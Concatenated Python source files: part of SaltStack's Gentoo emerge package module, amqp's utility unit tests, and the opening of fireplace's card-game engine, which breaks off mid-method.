        if salt.utils.path.which("emerge-delta-webrsync"):
            cmd = "emerge-delta-webrsync -q"
        else:
            cmd = "emerge-webrsync -q"
        return __salt__["cmd.retcode"](cmd) == 0
    # Default to deprecated `emerge --sync` form
    return __salt__["cmd.retcode"]("emerge --ask n --quiet --sync") == 0
def _flags_changed(inst_flags, conf_flags):
"""
@type inst_flags: list
@param inst_flags: list of use flags which were used
when package was installed
@type conf_flags: list
@param conf_flags: list of use flags form portage/package.use
@rtype: bool
@return: True, if lists have changes
"""
conf_flags = conf_flags[:]
for i in inst_flags:
try:
conf_flags.remove(i)
except ValueError:
return True
return True if conf_flags else False
def install(
    name=None,
    refresh=False,
    pkgs=None,
    sources=None,
    slot=None,
    fromrepo=None,
    uses=None,
    binhost=None,
    **kwargs
):
    """
    .. versionchanged:: 2015.8.12,2016.3.3,2016.11.0
        On minions running systemd>=205, `systemd-run(1)`_ is now used to
        isolate commands which modify installed packages from the
        ``salt-minion`` daemon's control group. This is done to keep systemd
        from killing any emerge commands spawned by Salt when the
        ``salt-minion`` service is restarted. (see ``KillMode`` in the
        `systemd.kill(5)`_ manpage for more information). If desired, usage of
        `systemd-run(1)`_ can be suppressed by setting a :mod:`config option
        <salt.modules.config.get>` called ``systemd.scope``, with a value of
        ``False`` (no quotes).

    .. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
    .. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html

    Install the passed package(s), add refresh=True to sync the portage tree
    before package is installed.

    name
        The name of the package to be installed. Note that this parameter is
        ignored if either "pkgs" or "sources" is passed. Additionally, please
        note that this option can only be used to emerge a package from the
        portage tree. To install a tbz2 package manually, use the "sources"
        option described below.

        CLI Example:

        .. code-block:: bash

            salt '*' pkg.install <package name>

    refresh
        Whether or not to sync the portage tree before installing.

    version
        Install a specific version of the package, e.g. 1.0.9-r1. Ignored
        if "pkgs" or "sources" is passed.

    slot
        Similar to version, but specifies a valid slot to be installed. It
        will install the latest available version in the specified slot.
        Ignored if "pkgs" or "sources" or "version" is passed.

        CLI Example:

        .. code-block:: bash

            salt '*' pkg.install sys-devel/gcc slot='4.4'

    fromrepo
        Similar to slot, but specifies the repository from the package will be
        installed. It will install the latest available version in the
        specified repository.
        Ignored if "pkgs" or "sources" or "version" is passed.

        CLI Example:

        .. code-block:: bash

            salt '*' pkg.install salt fromrepo='gentoo'

    uses
        Similar to slot, but specifies a list of use flag.
        Ignored if "pkgs" or "sources" or "version" is passed.

        CLI Example:

        .. code-block:: bash

            salt '*' pkg.install sys-devel/gcc uses='["nptl","-nossp"]'

    Multiple Package Installation Options:

    pkgs
        A list of packages to install from the portage tree. Must be passed as
        a python list.

        CLI Example:

        .. code-block:: bash

            salt '*' pkg.install pkgs='["foo","bar","~category/package:slot::repository[use]"]'

    sources
        A list of tbz2 packages to install. Must be passed as a list of dicts,
        with the keys being package names, and the values being the source URI
        or local path to the package.

        CLI Example:

        .. code-block:: bash

            salt '*' pkg.install sources='[{"foo": "salt://foo.tbz2"},{"bar": "salt://bar.tbz2"}]'

    binhost
        has two options try and force.
        try - tells emerge to try and install the package from a configured binhost.
        force - forces emerge to install the package from a binhost otherwise it fails out.

    Returns a dict containing the new package names and versions::

        {'<package>': {'old': '<old-version>',
                       'new': '<new-version>'}}
    """
    log.debug(
        "Called modules.pkg.install: %s",
        {
            "name": name,
            "refresh": refresh,
            "pkgs": pkgs,
            "sources": sources,
            "kwargs": kwargs,
            "binhost": binhost,
        },
    )
    if salt.utils.data.is_true(refresh):
        refresh_db()

    try:
        pkg_params, pkg_type = __salt__["pkg_resource.parse_targets"](
            name, pkgs, sources, **kwargs
        )
    except MinionError as exc:
        raise CommandExecutionError(exc)

    # Handle version kwarg for a single package target
    if pkgs is None and sources is None:
        version_num = kwargs.get("version")
        if not version_num:
            # slot/fromrepo/uses qualifiers only apply when no explicit
            # version was requested; they are appended in atom syntax.
            version_num = ""
            if slot is not None:
                version_num += ":{}".format(slot)
            if fromrepo is not None:
                version_num += "::{}".format(fromrepo)
            if uses is not None:
                version_num += "[{}]".format(",".join(uses))
        pkg_params = {name: version_num}

    if not pkg_params:
        return {}
    elif pkg_type == "file":
        emerge_opts = ["tbz2file"]
    else:
        emerge_opts = []

    if binhost == "try":
        bin_opts = ["-g"]
    elif binhost == "force":
        bin_opts = ["-G"]
    else:
        bin_opts = []

    changes = {}

    if pkg_type == "repository":
        # Build a full emerge target (atom) for each requested package,
        # recording any package.use / accept_keywords config changes made
        # along the way in ``changes``.
        targets = list()
        for param, version_num in pkg_params.items():
            original_param = param
            param = _p_to_cp(param)
            if param is None:
                raise portage.dep.InvalidAtom(original_param)

            if version_num is None:
                targets.append(param)
            else:
                keyword = None

                match = re.match("^(~)?([<>])?(=)?([^<>=]*)$", version_num)
                if match:
                    keyword, gt_lt, eq, verstr = match.groups()
                    prefix = gt_lt or ""
                    prefix += eq or ""
                    # If no prefix characters were supplied and verstr contains a version, use '='
                    if len(verstr) > 0 and verstr[0] != ":" and verstr[0] != "[":
                        prefix = prefix or "="
                        target = "{}{}-{}".format(prefix, param, verstr)
                    else:
                        target = "{}{}".format(param, verstr)
                else:
                    target = "{}".format(param)

                if "[" in target:
                    # USE flags requested: persist them in package.use and
                    # record the before/after flag sets.
                    old = __salt__["portage_config.get_flags_from_package_conf"](
                        "use", target
                    )
                    __salt__["portage_config.append_use_flags"](target)
                    new = __salt__["portage_config.get_flags_from_package_conf"](
                        "use", target
                    )
                    if old != new:
                        changes[param + "-USE"] = {"old": old, "new": new}
                    # Strip the USE portion; emerge gets the bare atom.
                    target = target[: target.rfind("[")]

                if keyword is not None:
                    # '~version' syntax means accept the testing keyword.
                    __salt__["portage_config.append_to_package_conf"](
                        "accept_keywords", target, ["~ARCH"]
                    )
                    changes[param + "-ACCEPT_KEYWORD"] = {"old": "", "new": "~ARCH"}

                if not changes:
                    inst_v = version(param)

                    # Prevent latest_version from calling refresh_db. Either we
                    # just called it or we were asked not to.
                    if latest_version(param, refresh=False) == inst_v:
                        all_uses = __salt__["portage_config.get_cleared_flags"](param)
                        if _flags_changed(*all_uses):
                            changes[param] = {
                                "version": inst_v,
                                "old": {"use": all_uses[0]},
                                "new": {"use": all_uses[1]},
                            }
                targets.append(target)
    else:
        # tbz2 files are passed to emerge as-is.
        targets = pkg_params

    cmd = []
    if salt.utils.systemd.has_scope(__context__) and __salt__["config.get"](
        "systemd.scope", True
    ):
        # Isolate emerge from the salt-minion cgroup (see docstring).
        cmd.extend(["systemd-run", "--scope"])
    cmd.extend(["emerge", "--ask", "n", "--quiet"])
    cmd.extend(bin_opts)
    cmd.extend(emerge_opts)
    cmd.extend(targets)

    old = list_pkgs()
    call = __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
    if call["retcode"] != 0:
        needed_changes = _process_emerge_err(call["stdout"], call["stderr"])
    else:
        needed_changes = []

    # Invalidate the cached package list and diff before/after.
    __context__.pop("pkg.list_pkgs", None)
    new = list_pkgs()
    changes.update(salt.utils.data.compare_dicts(old, new))

    if needed_changes:
        raise CommandExecutionError(
            "Error occurred installing package(s)",
            info={"needed changes": needed_changes, "changes": changes},
        )

    return changes
def update(pkg, slot=None, fromrepo=None, refresh=False, binhost=None, **kwargs):
    """
    .. versionchanged:: 2015.8.12,2016.3.3,2016.11.0
        On minions running systemd>=205, `systemd-run(1)`_ is now used to
        isolate commands which modify installed packages from the
        ``salt-minion`` daemon's control group. This is done to keep systemd
        from killing any emerge commands spawned by Salt when the
        ``salt-minion`` service is restarted. (see ``KillMode`` in the
        `systemd.kill(5)`_ manpage for more information). If desired, usage of
        `systemd-run(1)`_ can be suppressed by setting a :mod:`config option
        <salt.modules.config.get>` called ``systemd.scope``, with a value of
        ``False`` (no quotes).

    .. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
    .. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html

    Updates the passed package (emerge --update package)

    slot
        Restrict the update to a particular slot. It will update to the
        latest version within the slot.

    fromrepo
        Restrict the update to a particular repository. It will update to the
        latest version within the repository.

    binhost
        has two options try and force.
        try - tells emerge to try and install the package from a configured binhost.
        force - forces emerge to install the package from a binhost otherwise it fails out.

    Return a dict containing the new package names and versions::

        {'<package>': {'old': '<old-version>',
                       'new': '<new-version>'}}

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.update <package name>
    """
    if salt.utils.data.is_true(refresh):
        refresh_db()

    # Qualify the atom with slot and/or repository restrictions.
    full_atom = pkg
    if slot is not None:
        full_atom = "{}:{}".format(full_atom, slot)
    if fromrepo is not None:
        full_atom = "{}::{}".format(full_atom, fromrepo)

    if binhost == "try":
        bin_opts = ["-g"]
    elif binhost == "force":
        bin_opts = ["-G"]
    else:
        bin_opts = []

    old = list_pkgs()
    cmd = []
    if salt.utils.systemd.has_scope(__context__) and __salt__["config.get"](
        "systemd.scope", True
    ):
        # Isolate emerge from the salt-minion cgroup (see docstring).
        cmd.extend(["systemd-run", "--scope"])
    cmd.extend(["emerge", "--ask", "n", "--quiet", "--update", "--newuse", "--oneshot"])
    cmd.extend(bin_opts)
    cmd.append(full_atom)

    call = __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
    if call["retcode"] != 0:
        needed_changes = _process_emerge_err(call["stdout"], call["stderr"])
    else:
        needed_changes = []

    # Invalidate the cached package list and diff before/after.
    __context__.pop("pkg.list_pkgs", None)
    new = list_pkgs()
    ret = salt.utils.data.compare_dicts(old, new)

    if needed_changes:
        raise CommandExecutionError(
            "Problem encountered updating package(s)",
            info={"needed_changes": needed_changes, "changes": ret},
        )

    return ret
def upgrade(refresh=True, binhost=None, backtrack=3, **kwargs):
    """
    .. versionchanged:: 2015.8.12,2016.3.3,2016.11.0
        On minions running systemd>=205, `systemd-run(1)`_ is now used to
        isolate commands which modify installed packages from the
        ``salt-minion`` daemon's control group. This is done to keep systemd
        from killing any emerge commands spawned by Salt when the
        ``salt-minion`` service is restarted. (see ``KillMode`` in the
        `systemd.kill(5)`_ manpage for more information). If desired, usage of
        `systemd-run(1)`_ can be suppressed by setting a :mod:`config option
        <salt.modules.config.get>` called ``systemd.scope``, with a value of
        ``False`` (no quotes).

    .. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
    .. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html

    Run a full system upgrade (emerge -uDN @world)

    binhost
        has two options try and force.
        try - tells emerge to try and install the package from a configured binhost.
        force - forces emerge to install the package from a binhost otherwise it fails out.

    backtrack
        Specifies an integer number of times to backtrack if dependency
        calculation fails due to a conflict or an unsatisfied dependency
        (default: ´3´).

        .. versionadded:: 2015.8.0

    Returns a dictionary containing the changes:

    .. code-block:: python

        {'<package>': {'old': '<old-version>',
                       'new': '<new-version>'}}

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.upgrade
    """
    # NOTE: an earlier revision initialized ``ret`` to a state-style
    # {'changes': ..., 'result': ..., 'comment': ...} dict here; that value
    # was dead code, unconditionally overwritten by compare_dicts() below,
    # and has been removed.
    if salt.utils.data.is_true(refresh):
        refresh_db()

    if binhost == "try":
        bin_opts = ["--getbinpkg"]
    elif binhost == "force":
        bin_opts = ["--getbinpkgonly"]
    else:
        bin_opts = []

    old = list_pkgs()
    cmd = []
    if salt.utils.systemd.has_scope(__context__) and __salt__["config.get"](
        "systemd.scope", True
    ):
        # Isolate emerge from the salt-minion cgroup (see docstring).
        cmd.extend(["systemd-run", "--scope"])
    cmd.extend(
        [
            "emerge",
            "--ask",
            "n",
            "--quiet",
            "--backtrack",
            "{}".format(backtrack),
            "--update",
            "--newuse",
            "--deep",
        ]
    )
    if bin_opts:
        cmd.extend(bin_opts)
    cmd.append("@world")

    result = __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
    # Invalidate the cached package list and diff before/after.
    __context__.pop("pkg.list_pkgs", None)
    new = list_pkgs()
    ret = salt.utils.data.compare_dicts(old, new)

    if result["retcode"] != 0:
        raise CommandExecutionError(
            "Problem encountered upgrading packages",
            info={"changes": ret, "result": result},
        )

    return ret
def remove(name=None, slot=None, fromrepo=None, pkgs=None, **kwargs):
    """
    .. versionchanged:: 2015.8.12,2016.3.3,2016.11.0
        On minions running systemd>=205, `systemd-run(1)`_ is now used to
        isolate commands which modify installed packages from the
        ``salt-minion`` daemon's control group. This is done to keep systemd
        from killing any emerge commands spawned by Salt when the
        ``salt-minion`` service is restarted. (see ``KillMode`` in the
        `systemd.kill(5)`_ manpage for more information). If desired, usage of
        `systemd-run(1)`_ can be suppressed by setting a :mod:`config option
        <salt.modules.config.get>` called ``systemd.scope``, with a value of
        ``False`` (no quotes).

    .. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
    .. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html

    Remove packages via emerge --unmerge.

    name
        The name of the package to be deleted.

    slot
        Restrict the remove to a specific slot. Ignored if ``name`` is None.

    fromrepo
        Restrict the remove to a specific slot. Ignored if ``name`` is None.

    Multiple Package Options:

    pkgs
        Uninstall multiple packages. ``slot`` and ``fromrepo`` arguments are
        ignored if this argument is present. Must be passed as a python list.

    .. versionadded:: 0.16.0

    Returns a dict containing the changes.

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.remove <package name>
        salt '*' pkg.remove <package name> slot=4.4 fromrepo=gentoo
        salt '*' pkg.remove <package1>,<package2>,<package3>
        salt '*' pkg.remove pkgs='["foo", "bar"]'
    """
    try:
        pkg_params = __salt__["pkg_resource.parse_targets"](name, pkgs)[0]
    except MinionError as exc:
        raise CommandExecutionError(exc)
    old = list_pkgs()
    if (
        name
        and not pkgs
        and (slot is not None or fromrepo is not None)
        and len(pkg_params) == 1
    ):
        # BUG FIX: build the fully-qualified atom incrementally.  The
        # previous code assigned ``targets`` inside the slot/fromrepo
        # branches and then unconditionally overwrote it with [name],
        # so the slot/repository restrictions were silently discarded.
        fullatom = name
        if slot is not None:
            fullatom = "{}:{}".format(fullatom, slot)
        if fromrepo is not None:
            fullatom = "{}::{}".format(fullatom, fromrepo)
        targets = [fullatom]
    else:
        # Only attempt to unmerge packages that are actually installed.
        targets = [x for x in pkg_params if x in old]
    if not targets:
        return {}

    cmd = []
    if salt.utils.systemd.has_scope(__context__) and __salt__["config.get"](
        "systemd.scope", True
    ):
        # Isolate emerge from the salt-minion cgroup (see docstring).
        cmd.extend(["systemd-run", "--scope"])
    cmd.extend(["emerge", "--ask", "n", "--quiet", "--unmerge", "--quiet-unmerge-warn"])
    cmd.extend(targets)

    out = __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
    if out["retcode"] != 0 and out["stderr"]:
        errors = [out["stderr"]]
    else:
        errors = []

    # Invalidate the cached package list and diff before/after.
    __context__.pop("pkg.list_pkgs", None)
    new = list_pkgs()
    ret = salt.utils.data.compare_dicts(old, new)

    if errors:
        raise CommandExecutionError(
            "Problem encountered removing package(s)",
            info={"errors": errors, "changes": ret},
        )

    return ret
def purge(name=None, slot=None, fromrepo=None, pkgs=None, **kwargs):
    """
    .. versionchanged:: 2015.8.12,2016.3.3,2016.11.0
        On minions running systemd>=205, `systemd-run(1)`_ is now used to
        isolate commands which modify installed packages from the
        ``salt-minion`` daemon's control group. This is done to keep systemd
        from killing any emerge commands spawned by Salt when the
        ``salt-minion`` service is restarted. (see ``KillMode`` in the
        `systemd.kill(5)`_ manpage for more information). If desired, usage of
        `systemd-run(1)`_ can be suppressed by setting a :mod:`config option
        <salt.modules.config.get>` called ``systemd.scope``, with a value of
        ``False`` (no quotes).

    .. _`systemd-run(1)`: https://www.freedesktop.org/software/systemd/man/systemd-run.html
    .. _`systemd.kill(5)`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html

    Portage does not have a purge, this function calls remove followed
    by depclean to emulate a purge process

    name
        The name of the package to be deleted.

    slot
        Restrict the remove to a specific slot. Ignored if name is None.

    fromrepo
        Restrict the remove to a specific slot. Ignored if ``name`` is None.

    Multiple Package Options:

    pkgs
        Uninstall multiple packages. ``slot`` and ``fromrepo`` arguments are
        ignored if this argument is present. Must be passed as a python list.

    .. versionadded:: 0.16.0

    Returns a dict containing the changes.

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.purge <package name>
        salt '*' pkg.purge <package name> slot=4.4
        salt '*' pkg.purge <package1>,<package2>,<package3>
        salt '*' pkg.purge pkgs='["foo", "bar"]'
    """
    # Unmerge first, then let depclean sweep up now-unneeded dependencies;
    # the two change dicts are merged, with depclean results winning on
    # overlapping keys (same as the original dict.update behaviour).
    changes = remove(name=name, slot=slot, fromrepo=fromrepo, pkgs=pkgs)
    cleaned = depclean(name=name, slot=slot, fromrepo=fromrepo, pkgs=pkgs)
    changes.update(cleaned)
    return changes
def depclean(name=None, slot=None, fromrepo=None, pkgs=None):
    """
    Portage has a function to remove unused dependencies. If a package
    is provided, it will only removed the package if no other package
    depends on it.

    name
        The name of the package to be cleaned.

    slot
        Restrict the remove to a specific slot. Ignored if ``name`` is None.

    fromrepo
        Restrict the remove to a specific slot. Ignored if ``name`` is None.

    pkgs
        Clean multiple packages. ``slot`` and ``fromrepo`` arguments are
        ignored if this argument is present. Must be passed as a python list.

    Return a list containing the removed packages:

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.depclean <package name>
    """
    try:
        pkg_params = __salt__["pkg_resource.parse_targets"](name, pkgs)[0]
    except MinionError as exc:
        raise CommandExecutionError(exc)
    old = list_pkgs()
    if (
        name
        and not pkgs
        and (slot is not None or fromrepo is not None)
        and len(pkg_params) == 1
    ):
        # BUG FIX: build the fully-qualified atom incrementally.  The
        # previous code assigned ``targets`` inside the slot/fromrepo
        # branches and then unconditionally overwrote it with [name],
        # so the slot/repository restrictions were silently discarded
        # (same defect as in remove()).
        fullatom = name
        if slot is not None:
            fullatom = "{}:{}".format(fullatom, slot)
        if fromrepo is not None:
            fullatom = "{}::{}".format(fullatom, fromrepo)
        targets = [fullatom]
    else:
        # Only clean packages that are actually installed.
        targets = [x for x in pkg_params if x in old]

    cmd = ["emerge", "--ask", "n", "--quiet", "--depclean"] + targets
    __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
    # Invalidate the cached package list and diff before/after.
    __context__.pop("pkg.list_pkgs", None)
    new = list_pkgs()
    return salt.utils.data.compare_dicts(old, new)
def version_cmp(pkg1, pkg2, **kwargs):
    """
    Do a cmp-style comparison on two packages. Return -1 if pkg1 < pkg2, 0 if
    pkg1 == pkg2, and 1 if pkg1 > pkg2. Return None if there was a problem
    making the comparison.

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.version_cmp '0.2.4-0' '0.2.4.1-0'
    """
    # ``ignore_epoch`` is accepted (and discarded) purely for API
    # compatibility with the other pkg virtual modules; any other keyword
    # argument is rejected rather than silently ignored.
    extra_kwargs = salt.utils.args.clean_kwargs(**kwargs)
    extra_kwargs.pop("ignore_epoch", None)
    if extra_kwargs:
        salt.utils.args.invalid_kwargs(extra_kwargs)

    # Strip keyword markers, slots and USE-flag brackets, keeping just the
    # version-bearing atom text for Portage's comparator.
    atom_re = re.compile(r"^~?([^:\[]+):?[^\[]*\[?.*$")
    match1 = atom_re.match(pkg1)
    match2 = atom_re.match(pkg2)
    if not (match1 and match2):
        return None
    return portage.versions.vercmp(match1.group(1), match2.group(1))
def version_clean(version):
    """
    Clean the version string removing extra data.

    Strips any leading keyword marker (``~``) and comparison operators
    (``<``, ``>``, ``=``) as well as trailing slot, repository and
    USE-flag information, returning just the bare version/atom text.
    If the string does not match at all, it is returned unchanged.

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.version_clean <version_string>
    """
    match = re.match(r"^~?[<>]?=?([^<>=:\[]+).*$", version)
    # The previous code returned the raw ``re.Match`` object instead of
    # the cleaned string the docstring promises; extract the capture group.
    return match.group(1) if match else version
def check_extra_requirements(pkgname, pkgver):
    """
    Check if the installed package already has the given requirements.

    ``pkgver`` may carry a keyword marker (``~``), comparison operators,
    a slot, a repository (``::repo``) and USE flags (``[flag,...]``).
    Returns True when the installed package satisfies every requirement,
    False otherwise.

    CLI Example:

    .. code-block:: bash

        salt '*' pkg.check_extra_requirements 'sys-devel/gcc' '~>4.1.2:4.1::gentoo[nls,fortran]'
    """
    keyword = None

    # Split pkgver into keyword marker, <> operator, = operator and the rest.
    match = re.match("^(~)?([<>])?(=)?([^<>=]*)$", pkgver)
    if match:
        keyword, gt_lt, eq, verstr = match.groups()
        prefix = gt_lt or ""
        prefix += eq or ""
        # We need to delete quotes around use flag list elements
        verstr = verstr.replace("'", "")
        # If no prefix characters were supplied and verstr contains a version, use '='
        # NOTE(review): an empty verstr would raise IndexError here — assumes
        # callers always pass a non-empty requirement string.
        if verstr[0] != ":" and verstr[0] != "[":
            prefix = prefix or "="
            atom = "{}{}-{}".format(prefix, pkgname, verstr)
        else:
            atom = "{}{}".format(pkgname, verstr)
    else:
        # Unparsable requirement strings are treated as "already satisfied".
        return True

    try:
        cpv = _porttree().dbapi.xmatch("bestmatch-visible", atom)
    except portage.exception.InvalidAtom as iae:
        log.error("Unable to find a matching package for %s: (%s)", atom, iae)
        return False

    # No visible package matches the atom at all.
    if cpv == "":
        return False

    try:
        cur_repo, cur_use = _vartree().dbapi.aux_get(cpv, ["repository", "USE"])
    except KeyError:
        # Package is not installed.
        return False

    # Compare the requested repository (if any) against the installed one.
    des_repo = re.match(r"^.+::([^\[]+).*$", atom)
    if des_repo and des_repo.group(1) != cur_repo:
        return False

    # A desired flag fails the check when it is enabled in the atom but not
    # in the installed USE, or disabled ("-flag") but currently enabled.
    des_uses = set(portage.dep.dep_getusedeps(atom))
    cur_use = cur_use.split()
    if (
        len(
            [x for x in des_uses.difference(cur_use) if x[0] != "-" or x[1:] in cur_use]
        )
        > 0
    ):
        return False

    # A ~keyword requirement must be reflected in accept_keywords config.
    if keyword:
        if not __salt__["portage_config.has_flag"]("accept_keywords", atom, "~ARCH"):
            return False

    return True
| saltstack/salt | salt/modules/ebuildpkg.py | Python | apache-2.0 | 39,670 |
from __future__ import absolute_import, unicode_literals
from case import Mock, patch
from amqp.five import text_t
from amqp.utils import (NullHandler, bytes_to_str, coro, get_errno, get_logger,
str_to_bytes)
class test_get_errno:
    """get_errno() should find an errno on the attribute or in args."""

    def test_has_attr(self):
        error = KeyError('foo')
        error.errno = 23
        assert get_errno(error) == 23

    def test_in_args(self):
        error = KeyError(34, 'foo')
        error.args = (34, 'foo')
        assert get_errno(error) == 34

    def test_args_short(self):
        # A single-argument exception carries no errno.
        assert not get_errno(KeyError(34))

    def test_no_args(self):
        assert not get_errno(object())
class test_coro:
    """The @coro decorator must prime the generator to its first yield."""

    def test_advances(self):
        @coro
        def gen():
            yield 1
            yield 2
        primed = gen()
        # The first yield was already consumed by the decorator.
        assert next(primed) == 2
class test_str_to_bytes:
    """str_to_bytes() must always yield bytes, even for surrogates."""

    def test_from_unicode(self):
        converted = str_to_bytes(u'foo')
        assert isinstance(converted, bytes)

    def test_from_bytes(self):
        converted = str_to_bytes(b'foo')
        assert isinstance(converted, bytes)

    def test_supports_surrogates(self):
        surrogate_pair = u'\ud83d\ude4f'
        expected = surrogate_pair.encode('utf-8', 'surrogatepass')
        assert str_to_bytes(surrogate_pair) == expected
class test_bytes_to_str:
    """bytes_to_str() must yield text and round-trip surrogates."""

    def test_from_unicode(self):
        converted = bytes_to_str(u'foo')
        assert isinstance(converted, text_t)

    def test_from_bytes(self):
        assert bytes_to_str(b'foo')

    def test_support_surrogates(self):
        surrogate_pair = u'\ud83d\ude4f'
        assert bytes_to_str(surrogate_pair) == surrogate_pair
class test_NullHandler:

    def test_emit(self):
        # emit() on the null handler must swallow the record silently.
        handler = NullHandler()
        record = Mock(name='record')
        handler.emit(record)
class test_get_logger:
    """get_logger() accepts either a name or an existing logger object."""

    def test_as_str(self):
        with patch('logging.getLogger') as getLogger:
            logger = get_logger('foo.bar')
            getLogger.assert_called_with('foo.bar')
            assert logger is getLogger()

    def test_as_logger(self):
        with patch('amqp.utils.NullHandler') as _NullHandler:
            existing = Mock(name='logger')
            existing.handlers = None
            logger = get_logger(existing)
            # The passed-in logger is returned as-is, with a NullHandler
            # attached since it had no handlers of its own.
            assert logger is existing
            logger.addHandler.assert_called_with(_NullHandler())
| pexip/os-python-amqp | t/unit/test_utils.py | Python | lgpl-2.1 | 2,126 |
import logging
import random
import time
from calendar import timegm
from itertools import chain
from .actions import Attack, BeginTurn, Death, EndTurn, EventListener
from .card import Card, THE_COIN
from .entity import Entity
from .enums import CardType, PlayState, Step, Zone
from .managers import GameManager
from .utils import CardList
class GameOver(Exception):
	"""Raised by check_for_end_game() once the game has ended."""
	pass
class BaseGame(Entity):
	"""
	Core game entity: holds both players, the shared zones (board,
	graveyard), the turn/step state machine and the action queue.
	"""
	type = CardType.GAME
	MAX_MINIONS_ON_FIELD = 7
	Manager = GameManager

	def __init__(self, players):
		# ``data`` is initialized before Entity.__init__() runs.
		self.data = None
		super().__init__()
		self.players = players
		for player in players:
			player.game = self
		self.step = None
		self.next_step = None
		self.turn = 0
		self.current_player = None
		self.auras = []
		self.graveyard = CardList()
		self.minions_killed_this_turn = CardList()
		# When True, queue_actions() skips aura refreshes.
		self.no_aura_refresh = False

	def __repr__(self):
		return "<%s %s>" % (self.__class__.__name__, self)

	def __str__(self):
		# NOTE(review): assumes self.players is a 2-tuple; %-formatting a
		# plain list here would raise TypeError — confirm against callers.
		return "%s vs %s" % (self.players)

	def __iter__(self):
		return self.all_entities.__iter__()

	@property
	def game(self):
		"""A game is its own ``game`` (mirrors the Entity interface)."""
		return self

	@property
	def board(self):
		"""All minions on both players' fields."""
		return CardList(chain(self.players[0].field, self.players[1].field))

	@property
	def decks(self):
		return CardList(chain(self.players[0].deck, self.players[1].deck))

	@property
	def hands(self):
		return CardList(chain(self.players[0].hand, self.players[1].hand))

	@property
	def characters(self):
		return CardList(chain(self.players[0].characters, self.players[1].characters))

	@property
	def all_entities(self):
		"""Every entity in play, hand, deck and graveyard."""
		return CardList(chain(self.entities, self.hands, self.decks, self.graveyard))

	@property
	def entities(self):
		"""The game itself plus both players' in-play entities."""
		return CardList(chain([self], self.players[0].entities, self.players[1].entities))

	@property
	def live_entities(self):
		return CardList(chain(self.players[0].live_entities, self.players[1].live_entities))

	def filter(self, *args, **kwargs):
		"""Filter over every entity in the game (delegates to CardList)."""
		return self.all_entities.filter(*args, **kwargs)

	def attack(self, source, target):
		"""Queue an Attack action of \a source against \a target."""
		return self.queue_actions(source, [Attack(source, target)])

	def _attack(self):
		"""
		See https://github.com/jleclanche/fireplace/wiki/Combat
		for information on how attacking works
		"""
		attacker = self.proposed_attacker
		defender = self.proposed_defender
		self.proposed_attacker = None
		self.proposed_defender = None

		# The attack may have been redirected/cancelled by a trigger.
		if attacker.should_exit_combat:
			logging.info("Attack has been interrupted.")
			attacker.attacking = False
			defender.defending = False
			return

		# Save the attacker/defender atk values in case they change during the attack
		# (eg. in case of Enrage)
		def_atk = defender.atk
		attacker.hit(defender, attacker.atk)
		if def_atk:
			defender.hit(attacker, def_atk)
		attacker.attacking = False
		defender.defending = False
		attacker.num_attacks += 1

	def _play(self, card):
		"""
		Plays \a card from a Player's hand
		"""
		player = card.controller
		logging.info("%s plays %r", player, card)
		cost = card.cost
		if player.temp_mana:
			# The coin, Innervate etc
			cost -= player.temp_mana
			player.temp_mana = max(0, player.temp_mana - card.cost)
		player.used_mana += cost
		player.last_card_played = card
		card.zone = Zone.PLAY

	def card(self, id):
		"""Instantiate the card \a id and register it with the manager."""
		card = Card(id)
		self.manager.new_entity(card)
		return card

	def check_for_end_game(self):
		"""
		Check if one or more player is currently losing.
		End the game if they are.
		"""
		gameover = False
		for player in self.players:
			if player.playstate == PlayState.LOSING:
				gameover = True

		if gameover:
			# Both players losing at once is a tie; otherwise mark the
			# loser(s) LOST and the other player WON.
			if self.players[0].playstate == self.players[1].playstate:
				for player in self.players:
					player.playstate = PlayState.TIED
			else:
				for player in self.players:
					if player.playstate == PlayState.LOSING:
						player.playstate = PlayState.LOST
					else:
						player.playstate = PlayState.WON
			raise GameOver("The game has ended.")

	def process_deaths(self):
		"""Sweep every live entity marked for destruction."""
		actions = []
		for card in self.live_entities:
			if card.to_be_destroyed:
				actions += self._schedule_death(card)

		self.check_for_end_game()
		if actions:
			self.queue_actions(self, actions)

	def _schedule_death(self, card):
		"""
		Prepare a card for its death. Will run any related Death
		trigger attached to the Game object.
		Returns a list of actions to perform during the death sweep.
		"""
		logging.debug("Scheduling death for %r", card)
		card.ignore_events = True
		card.zone = Zone.GRAVEYARD
		self.graveyard.append(card)
		if card.type == CardType.MINION:
			self.minions_killed_this_turn.append(card)
			card.controller.minions_killed_this_turn += 1
		elif card.type == CardType.HERO:
			# A dead hero means that player is losing the game.
			card.controller.playstate = PlayState.LOSING
		return [Death(card)]

	def queue_actions(self, source, actions):
		"""
		Queue a list of \a actions for processing from \a source.
		"""
		ret = []
		if not hasattr(actions, "__iter__"):
			actions = (actions, )
		for action in actions:
			if isinstance(action, EventListener):
				# Queuing an EventListener registers it as a one-time event
				# This allows registering events from eg. play actions
				logging.debug("Registering %r on %r", action, self)
				action.once = True
				# FIXME: Figure out a cleaner way to get the event listener target
				if source.type == CardType.SPELL:
					listener = source.controller
				else:
					listener = source
				listener._events.append(action)
			else:
				ret.append(action.trigger(source))
		self.refresh_auras()
		return ret

	def pick_first_player(self):
		"""
		Picks and returns first player, second player
		In the default implementation, the first player is always
		"Player 0". Use CoinRules to decide it randomly.
		"""
		return self.players[0], self.players[1]

	def refresh_auras(self):
